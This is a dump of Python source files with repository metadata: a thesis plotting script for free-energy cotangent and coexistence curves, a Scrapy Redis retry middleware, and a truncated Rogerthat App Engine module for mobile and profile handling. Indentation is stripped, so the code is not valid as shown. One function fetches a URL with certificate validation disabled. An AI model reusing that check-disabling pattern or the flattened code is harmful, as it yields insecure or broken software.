count+=1
if count%10==0:
print '%f \r'%T,
sol = fsolve(g,[Lguess,Rguess]) # Magic happens here
data.append([T,sol[0],sol[1]]) # updating a list to keep track of the temperature T and corresponding left and right number densities found by fsolve
Lguess=sol[0] # Resets the next left guess number density for fsolve as the previous left solution
Rguess=sol[1] # Resets the next right guess number density for fsolve as the previous right solution
print(sol)
print(temp[-1])
# #
# #
########################### END fsolve WORK ###################################################
########################### START PLOTTING STUFF ##############################################
# #
# #
x = plt.linspace(1e-20,.2,4000) # x-axis grid space (used for when plotting number density on x-axis)
xmin=(3/(4.0*np.pi))*(1e-20)*(1/(SW.R)**3)
xmax=(3/(4.0*np.pi))*(0.2)*(1/(SW.R)**3)
xff = plt.linspace(xmin,xmax,4000)
nL = [data[i][1] for i in range(0,len(data))] # list of the left number density solutions obtained from fsolve
nR = [data[i][2] for i in range(0,len(data))] # list of the right number density solutions obtained from fsolve
Tlist = [data[i][0] for i in range(0,len(data))] # list of the corresponding temperatures for which the above number densitites were found
ffL = [i*((4*np.pi*(SW.R)**3)/3) for i in nL] # converts left number density to filling fraction
ffR = [i*((4*np.pi*(SW.R)**3)/3) for i in nR] # converts right number density to filling fraction
def cotangent_t0():
### Total free energy per volume VS n (with cotangent line shown) for the first temperature ###
plt.figure()
plt.title('Total free energy per volume VS n @ T=%0.4f'%Tlist[-1])
plt.ylabel('Total free energy per volume')
plt.xlabel('Number density (n)')
plt.plot(x,SW.ftot(Tlist[-1],x),color='#f36118',linewidth=1)
plt.plot(x, SW.numH_dftot_dn(Tlist[-1],nR[-1])*(x-nR[-1])+SW.ftot(Tlist[-1],nR[-1]),color='#00c0c0',linewidth=1)
plt.plot(nL[-1],SW.ftot(Tlist[-1],nL[-1]),'ko')
plt.plot(nR[-1],SW.ftot(Tlist[0],nR[-1]),'ko')
#plt.legend(loc='best')
plt.savefig('cotangent.pdf')
plt.show()
#plt.close("all")
def cotangent_tloop():
### Total free energy per volume VS n (with cotangent line shown) for multiple temperatures, can use to make a gif later ###
count = 0
for i in range(0,len(Tlist)):
if (i%20==0):
plt.figure()
plt.title('Total free energy per volume VS n @ T=%0.4f'%Tlist[i])
plt.ylabel('Total free energy per volume')
plt.xlabel('Number density (n)')
plt.ylim(-0.8,1)
plt.xlim(0,.18)
plt.plot(x,SW.ftot(Tlist[i],x))
plt.plot(x, SW.numH_dftot_dn(Tlist[i],nR[i])*(x-nR[i])+SW.ftot(Tlist[i],nR[i]))
plt.plot(nL[i],SW.ftot(Tlist[i],nL[i]),'ko')
plt.plot(nR[i],SW.ftot(Tlist[i],nR[i]),'ro')
plt.savefig('cotangent_loop/cotangent%03d'%count)
count += 1
def liq_vap_co_tvsff():
### Vapor - Liquid coexistence curve for temperature VS filling fraction ###
plt.figure()
plt.title('Vapor - Liquid coexistence')
plt.ylabel('T')
plt.xlabel('ff')
plt.plot(ffL,Tlist,'m')
plt.plot(ffR,Tlist,'c')
plt.savefig('liqVapCo_Tvsff.pdf')
#plt.axhline(1.329,color='k')
#plt.axhline(1.33,color='r')
#plt.show()
def liq_vap_co_tvsn():
### Vapor - Liquid coexistence curve for temperature VS filling fraction ###
plt.figure()
plt.title('Vapor - Liquid coexistence')
plt.ylabel('T')
plt.xlabel('ff')
plt.plot(nL,Tlist,'m')
plt.plot(nR,Tlist,'c')
plt.savefig('liqVapCo_Tvsn.pdf')
#plt.axhline(1.329,color='k')
#plt.axhline(1.33,color='r')
#plt.show()
def cotangent_fsolve_breakdown():
### Plots free energy per volume scaled by the tangent found from fsolve (used to determine approximately when fsolve stops working) ###
previousSize = nR[0]-nL[0]
count = 0
for i in range(0,len(nL)):
if (nR[i]-nL[i]) > 0.001: continue
#if (nR[i]-nL[i]) < 0.0000001: break
if True:
#if previousSize - (nR[i]-nL[i]) > 0.0000001:
x = plt.linspace(nL[i],nR[i],4000)
previousSize = nR[i]-nL[i]
datatangent=SW.numH_dftot_dn(Tlist[i],nR[i])*(x-nR[i])+SW.ftot(Tlist[i],nR[i])
#Tprev = Tlist[i]
plt.figure()
plt.title('ftot scaled VS n @ T=%0.6f'%Tlist[i])
plt.ylabel('Total free energy per volume')
plt.xlabel('n')
plt.plot(x,SW.ftot(Tlist[i],x)-datatangent,'b')
plt.plot(x,x-x,'g')
plt.plot(nL[i],0,'ko')
plt.plot(nR[i],0,'ro')
#plt.legend(loc='best')
plt.savefig('cotangent-graphs/relativeH/graph%04d'%count)
count += 1
#print(nR[i]-nL[i])
plt.close("all")
def liq_vap_co_pvsT():
### Vapor - Liquid coexistence curve for pressure vs temperature ###
pL=[]
pR=[]
pdiff=[]
for i in range(0,len(nL)):
pL.append(SW.findP(Tlist[i],nL[i]))
pR.append(SW.findP(Tlist[i],nR[i]))
pdiff.append(pL[i]-pR[i])
plt.figure()
plt.title('Vapor - Liquid coexistence')
plt.ylabel('Pressure')
plt.xlabel('Temperature')
plt.plot(Tlist,pL,color='#f36118',linewidth=5)
plt.plot(Tlist,pR,'c',linewidth=1)
plt.savefig('liqVapCo_pvsT.pdf')
plt.figure()
plt.title('Pressure check')
plt.ylabel('P')
plt.xlabel('T')
plt.plot(Tlist,pdiff,'r')
plt.savefig('liqVapCo_pvsT_diff.pdf')
#################################################
# CALL THE PLOTS YOU WANT TO PLOT #
# #
#cotangent_t0()
#cotangent_tloop()
#liq_vap_co_tvsff()
#liq_vap_co_tvsn()
#cotangent_fsolve_breakdown()
#liq_vap_co_pvsT()
# #
# #
#################################################
#np.savetxt('figs/snaft2.out',data)
# #
# #
######################################## END PLOTTING STUFF ###################################
|
droundy/deft
|
papers/thesis-scheirer/final/cotangent.py
|
Python
|
gpl-2.0
| 10,941
|
from scrapy.downloadermiddlewares.retry import RetryMiddleware
import logging
logger = logging.getLogger(__name__)
class RedisRetryMiddleware(RetryMiddleware):
def __init__(self, settings):
RetryMiddleware.__init__(self, settings)
def _retry(self, request, reason, spider):
retries = request.meta.get('retry_times', 0) + 1
if retries <= self.max_retry_times:
logger.debug("Retrying {request} " \
"(failed {retries} times): {reason}".format(
spider=spider, request=request,
retries=retries, reason=reason))
retryreq = request.copy()
retryreq.meta['retry_times'] = retries
retryreq.dont_filter = True
# our priority setup is different from super
retryreq.meta['priority'] = retryreq.meta['priority'] - 10
return retryreq
else:
logger.debug("Gave up retrying {request} "\
"(failed {retries} times): {reason}".format(
spider=spider, request=request,
retries=retries, reason=reason))
|
derekluo/scrapy-cluster
|
crawler/crawling/redis_retry_middleware.py
|
Python
|
mit
| 1,117
|
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
import base64
from datetime import datetime
import hashlib
import json
import logging
import os
from random import choice
import re
import time
from types import NoneType
from google.appengine.api import urlfetch
from google.appengine.api.images import Image
from google.appengine.ext import db, deferred, ndb
from mcfw.cache import cached
from mcfw.consts import MISSING
from mcfw.imaging import generate_qr_code
from mcfw.properties import azzert
from mcfw.rpc import returns, arguments
from rogerthat.bizz.communities.communities import get_community
from rogerthat.bizz.communities.models import CustomizationFeatures
from rogerthat.bizz.features import Features, Version
from rogerthat.bizz.job.update_friends import update_friend_service_identity_connections
from rogerthat.capi.system import unregisterMobile, forwardLogs
from rogerthat.consts import HIGH_LOAD_WORKER_QUEUE
from rogerthat.dal import put_and_invalidate_cache, generator
from rogerthat.dal.app import get_app_by_id
from rogerthat.dal.mobile import get_mobile_by_id, get_mobile_by_key, get_user_active_mobiles_count, \
get_mobiles_by_ios_push_id, get_mobile_settings_cached
from rogerthat.dal.profile import get_avatar_by_id, get_user_profile_key, get_user_profile, \
get_service_profile
from rogerthat.models import UserProfile, Avatar, CurrentlyForwardingLogs, Installation, InstallationLog, \
UserProfileInfo, UserProfileInfoAddress, UserProfileInfoPhoneNumber, UserAddressType
from rogerthat.models.properties.profiles import MobileDetailTO
from rogerthat.pages.legal import get_current_document_version, DOC_TERMS
from rogerthat.rpc import users
from rogerthat.rpc.models import Mobile, RpcCAPICall, ServiceAPICallback, Session, \
ClientError, ErrorPlatformVersion, ClientErrorOccurrence
from rogerthat.rpc.rpc import mapping, logError
from rogerthat.rpc.service import logServiceError
from rogerthat.settings import get_server_settings
from rogerthat.to.app import UpdateAppAssetResponseTO, UpdateEmbeddedAppsResponseTO, UpdateEmbeddedAppResponseTO
from rogerthat.to.profile import UserProfileTO
from rogerthat.to.service import ProfilePhoneNumberTO
from rogerthat.to.system import UserStatusTO, IdentityTO, UpdateSettingsResponseTO, UnregisterMobileResponseTO, \
UnregisterMobileRequestTO, IdentityUpdateResponseTO, LogErrorResponseTO, LogErrorRequestTO, ForwardLogsResponseTO, \
ForwardLogsRequestTO, AddProfileAddressRequestTO, ProfileAddressTO, UpdateProfileAddressRequestTO, \
AddProfilePhoneNumberRequestTO, UpdateProfilePhoneNumberRequestTO
from rogerthat.utils import now, try_or_defer, file_get_contents
from rogerthat.utils.app import get_app_id_from_app_user, get_human_user_from_app_user
from rogerthat.utils.crypto import encrypt_for_jabber_cloud, decrypt_from_jabber_cloud
from rogerthat.utils.languages import get_iso_lang
from rogerthat.utils.service import create_service_identity_user
from rogerthat.utils.transactions import run_in_xg_transaction, run_in_transaction
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO # @UnusedImport
_BASE_DIR = os.path.dirname(__file__)
_QR_SAMPLE_OVERLAY_PATH = os.path.join(_BASE_DIR, 'qr-sample.png')
QR_SAMPLE_OVERLAY = file_get_contents(_QR_SAMPLE_OVERLAY_PATH)
_QR_CODE_OVERLAY_PATH = os.path.join(_BASE_DIR, 'qr-brand.png')
DEFAULT_QR_CODE_OVERLAY = file_get_contents(_QR_CODE_OVERLAY_PATH)
_QR_OCA_CODE_OVERLAY_PATH = os.path.join(_BASE_DIR, 'qr-brand-oca.png')
DEFAULT_OCA_QR_CODE_OVERLAY = file_get_contents(_QR_OCA_CODE_OVERLAY_PATH)
_QR_CODE_HAND_ONLY_OVERLAY_PATH = os.path.join(_BASE_DIR, 'qr-hand-only.png')
HAND_ONLY_QR_CODE_OVERLAY = file_get_contents(_QR_CODE_HAND_ONLY_OVERLAY_PATH)
_QR_CODE_EMPTY_OVERLAY_PATH = os.path.join(_BASE_DIR, 'qr-empty.png')
EMPTY_QR_CODE_OVERLAY = file_get_contents(_QR_CODE_EMPTY_OVERLAY_PATH)
LOGO_SIZE = (72, 72)
LOGO_POSITION = (259, 220)
DEFAULT_QR_CODE_COLOR = [0x6a, 0xb8, 0x00]
ERROR_PATTERN_TXN_TOOK_TOO_LONG = re.compile('Transaction with name "(.*)" took (\d+) milliseconds!')
COM_MOBICAGE_RE = re.compile('\\b(com\.mobicage\.rogerth\\S+)')
BRACKETS_RE = re.compile('({.*?})')
@returns(NoneType)
@arguments(user=users.User, mobile=Mobile, reason=unicode)
def unregister_mobile(user, mobile, reason=None):
azzert(mobile.user == user)
mark_mobile_for_delete(user, mobile.key())
def trans():
request = UnregisterMobileRequestTO()
request.reason = reason
ctxs = unregisterMobile(unregister_mobile_success_callback, logError, user, request=request,
MOBILE_ACCOUNT=mobile,
DO_NOT_SAVE_RPCCALL_OBJECTS=True) # Only unregister this mobile :)
for ctx in ctxs:
ctx.mobile_key = mobile.key()
ctx.put()
run_in_transaction(trans, xg=True)
@mapping('com.mobicage.capi.system.unregisterMobileSuccessCallBack')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=UnregisterMobileResponseTO)
def unregister_mobile_success_callback(context, result):
mobile_key = context.mobile_key
mobile = get_mobile_by_key(mobile_key)
current_user = users.get_current_user()
azzert(mobile.user == current_user)
azzert(mobile == users.get_current_mobile())
mobile.status = mobile.status | Mobile.STATUS_UNREGISTERED
mobile.put()
@returns(NoneType)
@arguments(account=unicode, mobile_key=db.Key)
def delete_xmpp_account(account, mobile_key):
settings = get_server_settings()
jabberEndpoint = choice(settings.jabberAccountEndPoints)
account_parts = account.split("@")
azzert(len(account_parts) == 2)
user = account_parts[0]
server = account_parts[1]
payload = json.dumps(dict(username=user, server=server))
challenge, data = encrypt_for_jabber_cloud(settings.jabberSecret.encode('utf8'), payload)
jabberUrl = "http://%s/unregister" % jabberEndpoint
logging.info("Calling url %s to unregister %s" % (jabberUrl, account))
response = urlfetch.fetch(url=jabberUrl, payload=data, method="POST", allow_truncated=False, follow_redirects=False,
validate_certificate=False, deadline=30)
azzert(response.status_code == 200)
success, signalNum, out, err = json.loads(
decrypt_from_jabber_cloud(settings.jabberSecret.encode('utf8'), challenge, response.content))
logging.info("success: %s\nexit_code or signal: %s\noutput: %s\nerror: %s" % (success, signalNum, out, err))
azzert(success)
if mobile_key:
try_or_defer(_mark_mobile_as_uregistered, mobile_key)
def _mark_mobile_as_uregistered(mobile_key):
def trans():
mobile = db.get(mobile_key)
mobile.status = mobile.status | Mobile.STATUS_ACCOUNT_DELETED
mobile.put()
return mobile
db.run_in_transaction(trans)
def account_removal_response(sender, stanza):
logging.info("Incoming 'unregister' message from sender %s:\n%s" % (sender, stanza))
unregister_elements = stanza.getElementsByTagNameNS(u"mobicage:jabber", u"unregister")
unregister_element = unregister_elements[0]
mobile_id = unregister_element.getAttribute(u'mobileid')
mobile = get_mobile_by_id(mobile_id)
mobile.status = mobile.status | Mobile.STATUS_ACCOUNT_DELETED
mobile.put()
@returns(NoneType)
@arguments(current_user=users.User, current_mobile=Mobile, majorVersion=int, minorVersion=int, flushBackLog=bool,
appType=int, product=unicode, timestamp=long, timezone=unicode, timezoneDeltaGMT=int, osVersion=unicode,
deviceModelName=unicode, simCountry=unicode, simCountryCode=unicode, simCarrierName=unicode,
simCarrierCode=unicode, netCountry=unicode, netCountryCode=unicode, netCarrierName=unicode,
netCarrierCode=unicode, localeLanguage=unicode, localeCountry=unicode, now_time=int, deviceId=unicode)
def _heart_beat(current_user, current_mobile, majorVersion, minorVersion, flushBackLog, appType, product, timestamp,
timezone, timezoneDeltaGMT, osVersion, deviceModelName, simCountry, simCountryCode, simCarrierName,
simCarrierCode, netCountry, netCountryCode, netCarrierName, netCarrierCode, localeLanguage,
localeCountry, now_time, deviceId):
m = current_mobile
mobile_key = m.key()
ms_key = get_mobile_settings_cached(m).key()
def trans():
# type: () -> tuple[Mobile, UserProfile, bool]
keys = (mobile_key, ms_key, get_user_profile_key(current_user))
mobile, ms, my_profile = db.get(keys) # type: (Mobile, MobileSettings, UserProfile)
if mobile.account not in my_profile.get_mobiles():
logging.warn('Mobile account "%s" of user %s has been unregistered', mobile.account, current_user)
return mobile, my_profile, False
if appType != MISSING:
mobile.type = my_profile.get_mobiles()[mobile.account].type_ = appType
if simCountry != MISSING:
mobile.simCountry = simCountry
if simCountryCode != MISSING:
mobile.simCountryCode = simCountryCode
if simCarrierCode != MISSING:
mobile.simCarrierCode = simCarrierCode
if simCarrierName != MISSING:
mobile.simCarrierName = simCarrierName
if netCountry != MISSING:
mobile.netCountry = netCountry
if netCountryCode != MISSING:
mobile.netCountryCode = netCountryCode
if netCarrierCode != MISSING:
mobile.netCarrierCode = netCarrierCode
if netCarrierName != MISSING:
mobile.netCarrierName = netCarrierName
if deviceModelName != MISSING:
mobile.hardwareModel = deviceModelName
if osVersion != MISSING:
mobile.osVersion = osVersion
if localeCountry != MISSING:
mobile.localeCountry = localeCountry
if localeLanguage != MISSING:
mobile.localeLanguage = localeLanguage
if timezone != MISSING:
mobile.timezone = timezone
if timezoneDeltaGMT != MISSING:
mobile.timezoneDeltaGMT = timezoneDeltaGMT
if deviceId != MISSING:
mobile.deviceId = deviceId
language = mobile.localeLanguage
if language:
if '-' in language:
language = get_iso_lang(language.lower())
elif mobile.localeCountry:
language = '%s_%s' % (mobile.localeLanguage, mobile.localeCountry)
if my_profile.language != language:
my_profile.language = language
# trigger friend.update service api call
deferred.defer(update_friend_service_identity_connections, my_profile.key(), [u"language"],
_transactional=True)
ms.majorVersion = majorVersion
ms.minorVersion = minorVersion
ms.lastHeartBeat = now_time
my_profile.country = mobile.netCountry or mobile.simCountry or mobile.localeCountry
my_profile.timezone = mobile.timezone
my_profile.timezoneDeltaGMT = mobile.timezoneDeltaGMT
must_update_app_settings = False
if my_profile.tos_version != get_current_document_version(DOC_TERMS):
if mobile.is_android:
version = Features.ASK_TOS.android
elif mobile.is_ios:
version = Features.ASK_TOS.ios
else:
version = Version(0, 1)
must_update_app_settings = Version(majorVersion, minorVersion) >= version
put_and_invalidate_cache(ms, mobile, my_profile)
return mobile, my_profile, must_update_app_settings
mobile, profile, must_update_app_settings = run_in_xg_transaction(trans)
if must_update_app_settings:
from rogerthat.bizz.app import push_app_settings_to_user
# This will ask to agree to Terms and Conditions when version has changed
push_app_settings_to_user(profile, mobile.app_id)
@returns(int)
@arguments(current_user=users.User, current_mobile=Mobile, majorVersion=int, minorVersion=int, flushBackLog=bool,
appType=int, product=unicode, timestamp=long, timezone=unicode, timezoneDeltaGMT=int, osVersion=unicode,
deviceModelName=unicode, simCountry=unicode, simCountryCode=unicode, simCarrierName=unicode,
simCarrierCode=unicode, netCountry=unicode, netCountryCode=unicode, netCarrierName=unicode,
netCarrierCode=unicode, localeLanguage=unicode, localeCountry=unicode, deviceId=unicode)
def heart_beat(current_user, current_mobile, majorVersion, minorVersion, flushBackLog, appType, product, timestamp,
timezone, timezoneDeltaGMT, osVersion, deviceModelName, simCountry, simCountryCode, simCarrierName,
simCarrierCode, netCountry, netCountryCode, netCarrierName, netCarrierCode, localeLanguage,
localeCountry, deviceId):
now_time = int(time.time())
try_or_defer(_heart_beat, current_user, current_mobile, majorVersion, minorVersion, flushBackLog, appType, product,
timestamp, timezone, timezoneDeltaGMT, osVersion, deviceModelName, simCountry, simCountryCode,
simCarrierName, simCarrierCode, netCountry, netCountryCode, netCarrierName, netCarrierCode,
localeLanguage, localeCountry, now_time, deviceId,
accept_missing=True)
return now_time
@returns(UserStatusTO)
@arguments(user=users.User)
def get_user_status(user):
logging.info("Getting user status for %s" % user)
us = UserStatusTO()
user_profile = get_user_profile(user)
us.profile = UserProfileTO.fromUserProfile(user_profile) if user_profile else None
us.registered_mobile_count = get_user_active_mobiles_count(user)
if user_profile:
avatar = get_avatar_by_id(user_profile.avatarId)
us.has_avatar = bool(avatar and avatar.picture)
else:
us.has_avatar = False
return us
@returns(IdentityTO)
@arguments(app_user=users.User, user_profile=UserProfile)
def get_identity(app_user, user_profile=None):
idTO = IdentityTO()
profile = user_profile or get_user_profile(app_user)
human_user = get_human_user_from_app_user(app_user)
idTO.email = human_user.email()
if profile.first_name:
idTO.name = u'%s %s' % (profile.first_name, profile.last_name)
idTO.firstName = profile.first_name
idTO.lastName = profile.last_name
else:
idTO.name = profile.name
parts = profile.name.split(" ", 1)
if len(parts) == 1:
idTO.firstName = parts[0]
idTO.lastName = u''
else:
idTO.firstName = parts[0]
idTO.lastName = parts[1]
idTO.avatarId = profile.avatarId
idTO.qualifiedIdentifier = profile.qualifiedIdentifier
idTO.birthdate = profile.birthdate or 0
idTO.gender = profile.gender or 0
idTO.hasBirthdate = profile.birthdate is not None
idTO.hasGender = profile.gender is not None
idTO.profileData = profile.profileData
idTO.communityId = profile.community_id
idTO.homeScreenId = profile.home_screen_id
return idTO
@mapping('com.mobicage.capi.system.updateSettingsResponseHandler')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=UpdateSettingsResponseTO)
def update_settings_response_handler(context, result):
pass
@mapping('com.mobicage.capi.system.identityUpdateResponseHandler')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=IdentityUpdateResponseTO)
def identity_update_response_handler(context, result):
pass
@mapping('com.mobicage.capi.system.forwardLogsResponseHandler')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=ForwardLogsResponseTO)
def forward_logs_response_handler(context, result):
pass
def _mark_mobile_for_delete(mobile):
logging.info("Marking mobile (%s) for delete", mobile.key())
mobile.pushId = None
mobile.status = mobile.status | Mobile.STATUS_DELETE_REQUESTED
db.put_async(mobile)
@returns(NoneType)
@arguments(user=users.User, mobile_key=db.Key)
def mark_mobile_for_delete(user, mobile_key):
def trans():
mobile, profile = db.get((mobile_key, get_user_profile_key(user)))
_mark_mobile_for_delete(mobile)
if profile:
mobiles = profile.get_mobiles()
mobiles.pop(mobile.account, None)
profile.save_mobiles(mobiles)
profile.put()
else:
logging.warn("No profile found for user %s", user)
xg_on = db.create_transaction_options(xg=True)
db.run_in_transaction_options(xg_on, trans)
@returns(NoneType)
@arguments(mobile=Mobile, token=unicode)
def update_apple_push_device_token(mobile, token):
if mobile.type in Mobile.IOS_TYPES:
token.decode("hex") # just check whether is nicely hex encoded
if mobile.pushId == token:
pass # prevent unnecessary datastore accesses
old_mobiles = list(get_mobiles_by_ios_push_id(token))
user = mobile.user
def trans(mobile_key, user):
mobile, profile = db.get((mobile_key, get_user_profile_key(user)))
mobile.pushId = token
db.put_async(mobile)
mobiles = profile.get_mobiles()
if mobile.account in mobiles:
mobiles[mobile.account].pushId = token
else:
md = MobileDetailTO()
md.account = mobile.account
md.type_ = mobile.type
md.pushId = mobile.pushId
md.app_id = mobile.app_id
mobiles[md.account] = md
for old_mobile in old_mobiles:
if mobile_key != old_mobile.key():
if mobile.user == old_mobile.user:
_mark_mobile_for_delete(old_mobile)
mobiles.pop(old_mobile.account, None)
else:
deferred.defer(mark_mobile_for_delete, old_mobile.user, old_mobile.key(), _transactional=True)
profile.save_mobiles(mobiles)
profile.put()
xg_on = db.create_transaction_options(xg=True)
db.run_in_transaction_options(xg_on, trans, mobile.key(), user)
@returns(NoneType)
@arguments(token=unicode)
def obsolete_apple_push_device_token(token):
logging.info("Obsoleting apple push device " + token)
for mobile in get_mobiles_by_ios_push_id(token):
logging.info("Removing pushId from mobile %s of %s.", mobile.account, mobile.user)
mobile.pushId = None
mobile.put()
@cached(2, 0, datastore="qrcode_image")
@returns(str)
@arguments(content=unicode, overlay=str, color=[int], sample=bool)
def qrcode(content, overlay, color, sample):
return generate_qr_code(content, overlay, color, QR_SAMPLE_OVERLAY if sample else None)
@returns(NoneType)
@arguments(mobile=Mobile, phone_number=unicode)
def set_validated_phonenumber(mobile, phone_number):
if mobile.type == Mobile.TYPE_ANDROID_HTTP or mobile.type == Mobile.TYPE_ANDROID_FIREBASE_HTTP:
mobile.phoneNumber = phone_number
mobile.phoneNumberVerified = True
mobile.put()
elif mobile.type in Mobile.IOS_TYPES:
if mobile.phoneNumberVerificationCode == phone_number:
mobile.phoneNumberVerified = True
mobile.put()
else:
raise ValueError("Verification code does not match")
else:
raise ValueError("Unknown platform")
@returns(bool)
@arguments(request=LogErrorRequestTO)
def shouldLogClientError(request):
# Return boolean - should we put this error in mobile error logs
if request.description:
if 'Warning: DNS SRV did time out. Falling back to rogerth.at:5222' in request.description \
or 'Using fallback value for DNS SRV (but network is up)' in request.description:
return False
matches = ERROR_PATTERN_TXN_TOOK_TOO_LONG.findall(request.description)
if matches:
return False
if request.errorMessage:
if "ServerRespondedWrongHTTPCodeException" in request.errorMessage:
return False
if "java.lang.NullPointerException" in request.errorMessage \
and "android.os.Parcel.readException(Parcel.java" in request.errorMessage:
return False
if "java.lang.SecurityException: !@Too many alarms (500) registered from pid " in request.errorMessage:
return False
if "mCursorDrawable" in request.errorMessage and "huawei" in request.platformVersion.lower():
return False
return True
@returns(LogErrorResponseTO)
@arguments(request=LogErrorRequestTO, user=users.User, install_id=unicode, session=Session)
def logErrorBizz(request, user=None, install_id=None, session=None):
from add_1_monkey_patches import DEBUG
if not shouldLogClientError(request):
logging.warn('Ignoring logError request for %s:\n%s\n\n%s',
user or install_id, request.description, request.errorMessage)
return
if DEBUG:
logging.warn('CLIENT ERROR:\n%s\n\n%s', request.description, request.errorMessage)
deferred.defer(_log_client_error, request, user, install_id, session, _queue=HIGH_LOAD_WORKER_QUEUE)
def _filter_specific_stuff(msg):
msg = COM_MOBICAGE_RE.sub('', msg)
msg = BRACKETS_RE.sub('', msg)
return msg
def get_error_key(platform, message, description):
hashed_err = hashlib.sha256()
hashed_err.update(str(platform))
hashed_err.update('-')
hashed_err.update(_filter_specific_stuff(message).encode('utf-8') if message else '')
hashed_err.update('-')
hashed_err.update(_filter_specific_stuff(description).encode('utf-8') if description else '')
key_name = hashed_err.hexdigest()
return key_name
@arguments(request=LogErrorRequestTO, user=users.User, install_id=unicode, session=Session)
def _log_client_error(request, user, install_id, session):
key_name = get_error_key(request.platform, request.errorMessage, request.description)
error_key = ClientError.create_key(key_name)
# When too many collisions occur, consider a queue that can only execute 1 task/sec
@ndb.transactional()
def trans():
err = error_key.get()
if not err:
err = ClientError(key=error_key,
versions=[],
message=request.errorMessage,
description=request.description,
platform=request.platform)
for ver in err.versions:
if ver.platform_version == request.platformVersion and ver.client_version == request.mobicageVersion:
break
else:
err.versions.append(ErrorPlatformVersion(platform_version=request.platformVersion,
client_version=request.mobicageVersion))
err.count += 1
now_ = now()
ts = request.timestamp / 1000 if request.timestamp > now_ * 10 else request.timestamp
# don't accept timestamps in the future
if ts > now_:
ts = now_
if session and session.user != user:
if session.shop:
user_str = u'%s (%s via shop)' % (user, session.user)
else:
user_str = u'%s (%s)' % (user, session.user)
elif user:
user_str = u'%s' % user
else:
user_str = None
client_error = ClientErrorOccurrence(parent=error_key,
user=user.email() if user else None,
install_id=install_id,
occurred_date=datetime.utcfromtimestamp(ts),
user_str=user_str)
ndb.put_multi([err, client_error])
trans()
installation = Installation.get_by_key_name(install_id) if install_id else None
if installation:
InstallationLog(parent=installation, timestamp=now(), description=u'ClientError occurred').put()
@returns(NoneType)
@arguments(app_user=users.User, name=unicode, first_name=unicode, last_name=unicode, image=unicode, access_token=unicode,
birthdate=long, gender=long, has_birthdate=bool, has_gender=bool, current_mobile=Mobile)
def _edit_profile(app_user, name, first_name, last_name, image, access_token,
birthdate, gender, has_birthdate, has_gender, current_mobile):
from rogerthat.bizz.profile import update_avatar_profile, couple_facebook_id_with_profile, schedule_re_index
def trans(image):
changed_properties = []
user_profile = get_user_profile(app_user)
if first_name is not None and first_name is not MISSING and last_name is not None and last_name is not MISSING:
if user_profile.first_name != first_name:
changed_properties.append(u"first_name")
user_profile.first_name = first_name
if user_profile.last_name != last_name:
changed_properties.append(u"last_name")
user_profile.last_name = last_name
user_profile.name = u'%s %s' % (user_profile.first_name, user_profile.last_name)
elif name is not None and name is not MISSING:
if user_profile.name != name:
changed_properties.append(u"name")
user_profile.name = name
user_profile.first_name = None
user_profile.last_name = None
# has_birthdate and has_gender are used starting from 1.0.999.A and 1.0.137.i
if has_birthdate is not MISSING and has_gender is not MISSING:
if has_birthdate is True:
user_profile.birthdate = birthdate
user_profile.birth_day = UserProfile.get_birth_day_int(birthdate)
if has_gender is True:
user_profile.gender = gender
else:
# birthdate and gender are only used without has_gender and has_birthdate in 1.0.998.A
if birthdate is not MISSING and gender is not MISSING:
if birthdate == 0 and gender == 0:
pass # user pressed save in 1.0.998.A without setting gender and birthdate
else:
user_profile.birthdate = birthdate
user_profile.birth_day = UserProfile.get_birth_day_int(birthdate)
if gender != 0:
user_profile.gender = gender
if image:
avatar = get_avatar_by_id(user_profile.avatarId)
if not avatar:
avatar = Avatar(user=user_profile.user)
image = base64.b64decode(str(image))
img = Image(image)
if img.width > 150 or img.height > 150:
logging.info('Resizing avatar from %sx%s to 150x150', img.width, img.height)
img.resize(150, 150)
image = img.execute_transforms(img.format, 100)
update_avatar_profile(user_profile, avatar, image)
changed_properties.append(u"avatar")
user_profile.version += 1
user_profile.put()
from rogerthat.bizz.profile import update_mobiles, update_friends
update_mobiles(user_profile.user, user_profile, current_mobile) # update myIdentity
schedule_re_index(app_user)
if changed_properties: # Not necessary when only birth date or gender were updated.
update_friends(user_profile) # notify my friends.
xg_on = db.create_transaction_options(xg=True)
db.run_in_transaction_options(xg_on, trans, image)
if access_token:
couple_facebook_id_with_profile(app_user, access_token)
@returns(NoneType)
@arguments(app_user=users.User, name=unicode, first_name=unicode, last_name=unicode, image=unicode, access_token=unicode,
birthdate=long, gender=long, has_birthdate=bool, has_gender=bool, current_mobile=Mobile)
def edit_profile(app_user, name, first_name, last_name, image, access_token=None,
birthdate=MISSING, gender=MISSING, has_birthdate=MISSING, has_gender=MISSING, current_mobile=None):
try_or_defer(_edit_profile, app_user, name, first_name, last_name, image, access_token,
birthdate, gender, has_birthdate, has_gender, current_mobile, accept_missing=True)
@returns(bool)
@arguments(profile_info=(UserProfileInfo, NoneType))
def has_profile_addresses(profile_info):
return False if not (profile_info and profile_info.addresses) else True
@returns([ProfileAddressTO])
@arguments(app_user=users.User)
def get_profile_addresses(app_user):
return get_profile_addresses_to(UserProfileInfo.create_key(app_user).get())
@returns([ProfileAddressTO])
@arguments(user_profile_info=UserProfileInfo)
def get_profile_addresses_to(user_profile_info):
# type: (UserProfileInfo) -> list[ProfileAddressTO]
if not user_profile_info:
return []
return [ProfileAddressTO.from_model(address) for address in user_profile_info.addresses]
def _update_profile_address(app_user, request, is_update=False):
# type: (users.User, ProfileAddressTO, bool) -> UserProfileInfoAddress
app_id = get_app_id_from_app_user(app_user)
country_code = get_app_by_id(app_id).country
if not country_code:
raise Exception('No country code set for app %s' % app_id)
upi_key = UserProfileInfo.create_key(app_user)
profile_info = upi_key.get()
if not profile_info:
if is_update:
return None
profile_info = UserProfileInfo(key=upi_key)
address_uid = UserProfileInfoAddress.create_uid([country_code,
request.zip_code,
request.street_name,
request.house_nr,
request.bus_nr])
if is_update:
old_address = profile_info.get_address(request.uid)
if not old_address:
return None
